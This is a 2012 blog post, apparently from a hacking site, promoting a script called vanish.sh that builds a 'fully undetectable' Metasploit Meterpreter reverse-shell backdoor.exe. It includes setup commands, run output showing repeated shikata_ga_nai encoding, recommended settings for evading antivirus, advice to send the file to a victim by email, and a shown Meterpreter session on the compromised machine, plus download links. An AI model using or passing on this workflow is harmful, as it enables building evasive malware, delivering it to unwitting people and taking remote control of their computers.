19 October 2012

Easy Bypass AV and Firewall

0 Comment


Security Labs launch an automated Anti-Virus and Firewall Bypass Script BY team SecurityLabs and The Hacker News :D (Thanks to Astr0baby)


Its an Article on how can we create a fully undetectable metasploit payload,
This is an Modified and Stable Version in order to work with Backtrack 5 distribution.



Code:
root@bt:/pentest/exploits/framework# chmod + vanish.sh 
root@bt:/pentest/exploits/framework# ./vanish.sh 
************************************************************
    Fully Undetectable Metasploit Payload generaor Beta     
        Original Concept and Script by Astr0baby            
     Stable Version of Script is Edited by Vanish3r         
    Video Tutorial by Vanish3r - www.securitylabs.in        
 Powered by TheHackerNews.com and securitylabs.in           
************************************************************
# Runtimes
In order to be able to compile the generated payload we must need this package:- Mingw32 gcc-runtime
which you can install by,


Code:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
-------------------------------------------------------------------------------------------------------------------------------------------
After the installation we must move our shell-script - Vanish.sh - to default Metasploit folder (/pentest/exploits/framework) and execute it:


Code:
root@bt:/pentest/exploits/framework# chmod + vanish.sh 
root@bt:/pentest/exploits/framework# sh vanish.sh 
************************************************************
    Fully Undetectable Metasploit Payload generaor Beta     
        Original Concept and Script by Astr0baby            
     Stable Version of Script is Edited by Vanish3r         
    Video Tutorial by Vanish3r - www.securitylabs.in        
 Powered by TheHackerNews.com and securitylabs.in           
************************************************************
Network Device On your Computer :
 lo:
 eth2:
Which Interface to use ?  eth2
What Port Number are we gonna listen to? : 443 
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 7000
How many times you want to encode ? 1-20 : 14
Current Ip is : 192.168.93.1
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)

[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)

[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)

[*] x86/shikata_ga_nai succeeded with size 587 (iteration=11)

[*] x86/shikata_ga_nai succeeded with size 614 (iteration=12)

[*] x86/shikata_ga_nai succeeded with size 641 (iteration=13)

[*] x86/shikata_ga_nai succeeded with size 668 (iteration=14)

backdoor.exe ...generated in seclabs subfolder
backdoor.exe sha1checksum is .. 94da3a4888d8158c9dafa51e2d35528d99a1e871 backdoor.exe
      starting the meterpreter listener...

Vanish.sh will create a Sub folder called "seclabs" and you will find your backdoor.exe there :)


# Recommended :
Seed Number = 7000 and 
Number of Encode = 14


# Sending to Victim :
You can Easily send by Email as it is Undetectable by Most of Anti-Virus or any other way
After Execution on Victim, Now our Metasploit console Shows Connection :))


Code:

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
[*] Started reverse handler on 192.168.93.1:443
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.93.2
[*] Meterpreter session 1 opened (192.168.93.1:443 -> 192.168.93.2:55865) 
 
meterpreter > ps
 
Process list
============
 
 PID  Name            Arch  Session  User                      Path
 ---  ----            ----  -------  ----                      ----
 12   services.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\services.exe
 17   explorer.exe    x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\explorer.exe
 33   winedevice.exe  x86   0        NT AUTHORITY\INTERACTIVE  C:\windows\system32\winedevice.exe
 8    24382.exe       x86   0        NT AUTHORITY\INTERACTIVE  Z:\pentest\exploits\framework\ShellCode\24382.exe
 
meterpreter > sysinfo
Computer        : bt
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32



# Note:
By default Script Generates Reverse TCP Payload but you can change it by some modifications in Script [vanish.sh]
--------------------------------------------------------------------------------------------------------------------------
Proof Of Concept - Virus Scan Report of Backdoor :




















--------------------------------------------------------------------------------------------------------------------------
# Get Vanish.sh
Download Link of Vanish.sh : Click Here
File Info :
Script Name : Vanish.sh
Size : 3.3 KB

Pastebin Version : http://pastebin.com/7xmvGnks


SHARE THIS
Unknown

Author:

0 comments: